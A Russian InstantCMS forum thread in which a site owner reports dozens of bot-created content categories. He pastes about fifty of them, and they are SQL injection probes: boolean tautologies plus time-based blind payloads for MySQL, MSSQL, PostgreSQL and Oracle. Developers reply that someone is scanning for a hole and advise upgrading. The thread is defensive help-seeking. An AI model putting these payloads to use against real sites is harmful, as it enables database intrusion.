Найти на сайте
  2. Форумы
  3. МАСТЕРСКАЯ
  4. Вопросы безопасности
  5. Много категорий типа Mr. и др.

Много категорий типа Mr. и др.

Стоит ли беспокоится?

#1 5 августа 2024 в 22:16

каждая строка это категория в типе контента.

  1. -1 OR 2+855-855-1=0+0+0+1 --

  2. -1 OR 3+855-855-1=0+0+0+1 --

  3. -1 OR 2+147-147-1=0+0+0+1

  4. -1 OR 3+147-147-1=0+0+0+1

  5. -1 OR 3*2

  6. Mr.

  7. -1 OR 3*2>(0+5+147-147)

  8. -1\' OR 2+981-981-1=0+0+0+1 --

  9. -1\' OR 3+981-981-1=0+0+0+1 --

  10. -1\' OR 2+904-904-1=0+0+0+1 or \'MYuIeOEN\'=\'

  11. -1\' OR 3+904-904-1=0+0+0+1 or \'MYuIeOEN\'=\'

  12. -1\" OR 2+555-555-1=0+0+0+1 --

  13. -1\" OR 3+555-555-1=0+0+0+1 --

  14. Mr.

  15. if(now()=sysdate(),sleep(15),0)

  16. Mr.

  17. 0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z

  18. Mr.

  19. 0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z

  20. Mr.

  21. (select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/

  22. Mr.

  23. 1 waitfor delay \'0:0:15\' --

  24. Mr.

  25. Mr.

  26. Mr.

  27. Mr.

  28. AjuVsul7\'; waitfor delay \'0:0:15\' --

  29. Mr.

  30. 06zm366K\' OR 375=(SELECT 375 FROM PG_SLEEP(15))--

  31. Mr.

  32. -1 OR 2+585-585-1=0+0+0+1 --

  33. -1 OR 2+405-405-1=0+0+0+1

  34. -1\' OR 2+638-638-1=0+0+0+1 --

  35. 2mb94AJ9\') OR 103=(SELECT 103 FROM PG_SLEEP(15))--

  36. -1\' OR 2+873-873-1=0+0+0+1 or \'g7dxtmIH\'=\'

  37. -1\" OR 2+36-36-1=0+0+0+1 --

  38. I1fX7Isk\')) OR 552=(SELECT 552 FROM PG_SLEEP(15))--

  39. if(now()=sysdate(),sleep(15),0)

  40. Mr.\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'

  41. 1\'\"

  42. 1

  43. 0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z

  44. @@XLB2I

  45. 0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z

  46. (select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/

  47. 1 waitfor delay \'0:0:15\' --

  48. jjIRapTE\'; waitfor delay \'0:0:15\' --

  49. uzfqslgs\' OR 75=(SELECT 75 FROM PG_SLEEP(15))--

  50. 35N25zWZ\') OR 322=(SELECT 322 FROM PG_SLEEP(15))--

  51. 4v8xaMUP\')) OR 100=(SELECT 100 FROM PG_SLEEP(15))--

  52. Mr.\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'

  53. 1\'\"

  54.  

Версия инстанта 2.12.2, версия php 7.1.33

Ребята подскажите пожалуйста, стоит беспокоится?

В доступах было разрешение создавать категории, сейчас убрал.

Периодически появляются «гости» которые создают спамный контент и отправляют на модерацию. Я сразу таких баню и контент удаляю без публикации, но это было максимум раз 10-20, а тут зашёл в админку в контент и охренел от количества категорий. В примере только часть. больше всего категорий Mr.

0
#2 5 августа 2024 в 23:18

Ищут уязвимость, хотят взломать 

Telegram канал https://t.me/my_instantcms
0
#3 6 августа 2024 в 21:56

 My-InstantCMS.Ru, да это понятно. Хотел узнать стоит ли беспокоится в связи с уже вроде как старенькой версией инстанта и php.

0
#4 6 августа 2024 в 22:35

 fincheck, Обновите хотя бы инстант

Telegram канал https://t.me/my_instantcms
0
#5 6 августа 2024 в 23:02

 fincheck, надо обновляться

0
#6 7 августа 2024 в 11:14

 My-InstantCMS.RuLoadырь, Я бы с радостью, но боюсь просто и по маслу это не пройдёт, уж больно много там внедрено/вживлено)). Вам легко рассуждать, вы разработчики и в случае чего быстро всё полечите. 

0
#7 7 августа 2024 в 11:29

но боюсь просто и по маслу это не пройдёт, уж больно много там внедрено/вживлено))

fincheck

Мы это понимаем, но в 2.16.1 instantcms.ru/novosti/release2161.html благодаря huntr.dev было многое проверено и исправлено в плане безопасности движка. И вы можете сделать вручную те же правки в файлах и базе данных, что от версии к версии вносились в коммитах на гите. Это будет долгий и тернистый путь, но в этом случае ваши внедрения/вживления останутся с вами и возможно даже будут работоспособными.

А если и это для вас непосильная задача, то не парьтесь — тут беспокоиться уже не о чем ))).

+1
Как запретить открывать аватар
11.000+ редиректов на сайте.
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.

Похожие темы

Некорректная фильтрация в фильтре при нахождении в категории

Релизы 2.X Создана 1 год назад 3 сообщения

[ЕСТЬ РЕШЕНИЕ] Настройка типа контента по умолчанию

Типы контента / статьи / страницы Создана 3 года назад 9 сообщений

[ЕСТЬ РЕШЕНИЕ] Количество категорий

Типы контента / статьи / страницы Создана 3 года назад 10 сообщений

Проблема при создании типа контента

Релизы 2.X Создана 4 года назад 1 сообщение

Автоподгрузка записей типа контента

Компоненты Создана 3 года назад 9 сообщений

свой шаблон записи для типа контента

Разработка и тестирование Создана 1 год назад 9 сообщений

InstantCMS Team

Связь с нами
Email dev@instantcms.ru

Делаем полезные Интернет проекты с 2008 года 💫

О проекте

Поддержка

Дополнения

Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.